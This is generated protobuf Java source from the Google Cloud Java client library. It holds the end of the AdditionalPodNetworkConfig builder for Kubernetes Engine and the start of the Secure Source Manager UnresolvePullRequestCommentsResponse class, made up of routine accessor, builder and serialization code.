*/ public Builder setSecondaryPodRangeBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); secondaryPodRange_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private com.google.container.v1.MaxPodsConstraint maxPodsPerNode_; private com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder> maxPodsPerNodeBuilder_; /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return Whether the maxPodsPerNode field is set. */ public boolean hasMaxPodsPerNode() { return ((bitField0_ & 0x00000004) != 0); } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return The maxPodsPerNode. */ public com.google.container.v1.MaxPodsConstraint getMaxPodsPerNode() { if (maxPodsPerNodeBuilder_ == null) { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } else { return maxPodsPerNodeBuilder_.getMessage(); } } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder setMaxPodsPerNode(com.google.container.v1.MaxPodsConstraint value) { if (maxPodsPerNodeBuilder_ == null) { if (value == null) { throw new NullPointerException(); } maxPodsPerNode_ = value; } else { maxPodsPerNodeBuilder_.setMessage(value); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. 
* </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder setMaxPodsPerNode( com.google.container.v1.MaxPodsConstraint.Builder builderForValue) { if (maxPodsPerNodeBuilder_ == null) { maxPodsPerNode_ = builderForValue.build(); } else { maxPodsPerNodeBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder mergeMaxPodsPerNode(com.google.container.v1.MaxPodsConstraint value) { if (maxPodsPerNodeBuilder_ == null) { if (((bitField0_ & 0x00000004) != 0) && maxPodsPerNode_ != null && maxPodsPerNode_ != com.google.container.v1.MaxPodsConstraint.getDefaultInstance()) { getMaxPodsPerNodeBuilder().mergeFrom(value); } else { maxPodsPerNode_ = value; } } else { maxPodsPerNodeBuilder_.mergeFrom(value); } if (maxPodsPerNode_ != null) { bitField0_ |= 0x00000004; onChanged(); } return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder clearMaxPodsPerNode() { bitField0_ = (bitField0_ & ~0x00000004); maxPodsPerNode_ = null; if (maxPodsPerNodeBuilder_ != null) { maxPodsPerNodeBuilder_.dispose(); maxPodsPerNodeBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public com.google.container.v1.MaxPodsConstraint.Builder getMaxPodsPerNodeBuilder() { bitField0_ |= 0x00000004; onChanged(); return getMaxPodsPerNodeFieldBuilder().getBuilder(); } /** * * * <pre> * The maximum number of pods per node which use this pod network. 
* </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public com.google.container.v1.MaxPodsConstraintOrBuilder getMaxPodsPerNodeOrBuilder() { if (maxPodsPerNodeBuilder_ != null) { return maxPodsPerNodeBuilder_.getMessageOrBuilder(); } else { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder> getMaxPodsPerNodeFieldBuilder() { if (maxPodsPerNodeBuilder_ == null) { maxPodsPerNodeBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder>( getMaxPodsPerNode(), getParentForChildren(), isClean()); maxPodsPerNode_ = null; } return maxPodsPerNodeBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.container.v1.AdditionalPodNetworkConfig) } // @@protoc_insertion_point(class_scope:google.container.v1.AdditionalPodNetworkConfig) private static final com.google.container.v1.AdditionalPodNetworkConfig DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.container.v1.AdditionalPodNetworkConfig(); } public static com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstance() { return DEFAULT_INSTANCE; } 
private static final com.google.protobuf.Parser<AdditionalPodNetworkConfig> PARSER = new com.google.protobuf.AbstractParser<AdditionalPodNetworkConfig>() { @java.lang.Override public AdditionalPodNetworkConfig parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdditionalPodNetworkConfig> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdditionalPodNetworkConfig> getParserForType() { return PARSER; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,802
java-securesourcemanager/proto-google-cloud-securesourcemanager-v1/src/main/java/com/google/cloud/securesourcemanager/v1/UnresolvePullRequestCommentsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/securesourcemanager/v1/secure_source_manager.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.securesourcemanager.v1; /** * * * <pre> * The response to unresolve multiple pull request comments. * </pre> * * Protobuf type {@code google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse} */ public final class UnresolvePullRequestCommentsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) UnresolvePullRequestCommentsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use UnresolvePullRequestCommentsResponse.newBuilder() to construct. 
private UnresolvePullRequestCommentsResponse( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UnresolvePullRequestCommentsResponse() { pullRequestComments_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UnresolvePullRequestCommentsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.class, com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.Builder .class); } public static final int PULL_REQUEST_COMMENTS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> pullRequestComments_; /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> getPullRequestCommentsList() { return pullRequestComments_; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public java.util.List< ? 
extends com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsOrBuilderList() { return pullRequestComments_; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public int getPullRequestCommentsCount() { return pullRequestComments_.size(); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public com.google.cloud.securesourcemanager.v1.PullRequestComment getPullRequestComments( int index) { return pullRequestComments_.get(index); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder getPullRequestCommentsOrBuilder(int index) { return pullRequestComments_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < pullRequestComments_.size(); i++) { output.writeMessage(1, pullRequestComments_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < pullRequestComments_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, pullRequestComments_.get(i)); } size += 
getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse)) { return super.equals(obj); } com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse other = (com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) obj; if (!getPullRequestCommentsList().equals(other.getPullRequestCommentsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPullRequestCommentsCount() > 0) { hash = (37 * hash) + PULL_REQUEST_COMMENTS_FIELD_NUMBER; hash = (53 * hash) + getPullRequestCommentsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( com.google.protobuf.ByteString data, 
com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(com.google.protobuf.CodedInputStream input) throws 
java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * The response to unresolve multiple pull request comments. 
* </pre> * * Protobuf type {@code google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.class, com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.Builder .class); } // Construct using // com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (pullRequestCommentsBuilder_ == null) { pullRequestComments_ = java.util.Collections.emptyList(); } else { pullRequestComments_ = null; pullRequestCommentsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto 
.internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstanceForType() { return com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse .getDefaultInstance(); } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse build() { com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse buildPartial() { com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result = new com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result) { if (pullRequestCommentsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { pullRequestComments_ = java.util.Collections.unmodifiableList(pullRequestComments_); bitField0_ = (bitField0_ & ~0x00000001); } result.pullRequestComments_ = pullRequestComments_; } else { result.pullRequestComments_ = pullRequestCommentsBuilder_.build(); } } private void buildPartial0( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder 
clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) { return mergeFrom( (com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse other) { if (other == com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse .getDefaultInstance()) return this; if (pullRequestCommentsBuilder_ == null) { if (!other.pullRequestComments_.isEmpty()) { if (pullRequestComments_.isEmpty()) { pullRequestComments_ = other.pullRequestComments_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePullRequestCommentsIsMutable(); pullRequestComments_.addAll(other.pullRequestComments_); } onChanged(); } } else { if (!other.pullRequestComments_.isEmpty()) { if (pullRequestCommentsBuilder_.isEmpty()) { pullRequestCommentsBuilder_.dispose(); pullRequestCommentsBuilder_ = null; pullRequestComments_ = other.pullRequestComments_; bitField0_ = (bitField0_ & ~0x00000001); pullRequestCommentsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getPullRequestCommentsFieldBuilder() : null; } else { pullRequestCommentsBuilder_.addAllMessages(other.pullRequestComments_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.securesourcemanager.v1.PullRequestComment m = input.readMessage( com.google.cloud.securesourcemanager.v1.PullRequestComment.parser(), extensionRegistry); if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(m); } else { pullRequestCommentsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> pullRequestComments_ = java.util.Collections.emptyList(); private void ensurePullRequestCommentsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { pullRequestComments_ = new java.util.ArrayList<com.google.cloud.securesourcemanager.v1.PullRequestComment>( pullRequestComments_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, 
com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> pullRequestCommentsBuilder_; /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> getPullRequestCommentsList() { if (pullRequestCommentsBuilder_ == null) { return java.util.Collections.unmodifiableList(pullRequestComments_); } else { return pullRequestCommentsBuilder_.getMessageList(); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public int getPullRequestCommentsCount() { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.size(); } else { return pullRequestCommentsBuilder_.getCount(); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment getPullRequestComments( int index) { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.get(index); } else { return pullRequestCommentsBuilder_.getMessage(index); } } /** * * * <pre> * The list of pull request comments unresolved. 
* </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder setPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.set(index, value); onChanged(); } else { pullRequestCommentsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder setPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.set(index, builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(value); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. 
* </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(index, value); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(index, builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addAllPullRequestComments( java.lang.Iterable<? 
extends com.google.cloud.securesourcemanager.v1.PullRequestComment> values) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, pullRequestComments_); onChanged(); } else { pullRequestCommentsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder clearPullRequestComments() { if (pullRequestCommentsBuilder_ == null) { pullRequestComments_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { pullRequestCommentsBuilder_.clear(); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder removePullRequestComments(int index) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.remove(index); onChanged(); } else { pullRequestCommentsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder getPullRequestCommentsBuilder(int index) { return getPullRequestCommentsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of pull request comments unresolved. 
* </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder getPullRequestCommentsOrBuilder(int index) { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.get(index); } else { return pullRequestCommentsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List< ? extends com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsOrBuilderList() { if (pullRequestCommentsBuilder_ != null) { return pullRequestCommentsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(pullRequestComments_); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder addPullRequestCommentsBuilder() { return getPullRequestCommentsFieldBuilder() .addBuilder( com.google.cloud.securesourcemanager.v1.PullRequestComment.getDefaultInstance()); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder addPullRequestCommentsBuilder(int index) { return getPullRequestCommentsFieldBuilder() .addBuilder( index, com.google.cloud.securesourcemanager.v1.PullRequestComment.getDefaultInstance()); } /** * * * <pre> * The list of pull request comments unresolved. 
